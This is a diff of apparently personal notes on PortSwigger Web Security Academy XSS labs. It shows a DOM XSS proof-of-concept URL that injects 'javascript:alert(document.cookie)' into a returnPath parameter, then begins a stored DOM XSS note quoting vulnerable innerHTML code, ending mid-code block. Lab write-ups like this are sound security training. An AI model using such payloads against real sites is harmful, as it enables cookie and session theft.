bergeramit/PortSwiggerWebSecurityAcademy/Client/1 - XSS.md

-# DOM XSS in jQuery anchor href attribute sink using location.search source
+# Lab: DOM XSS in jQuery anchor href attribute sink using location.search source
 Browse to 'feedback' page, change the url and click back
 ```
 https://acb21f0a1ef32c1381a8b596007000af.web-security-academy.net/feedback?returnPath=javascript:alert(document.cookie)
 ```

-# Stored DOM XSS
+# Lab: Stored DOM XSS
-In blog post there was a stored XSS, later proccessed by js.
+There was a stored XSS on the blog-comments page, later proccessed by js.
 The vulnerable code:
 ```javascript
 commentBodyPElement.innerHTML = escapeHTML(comment.body);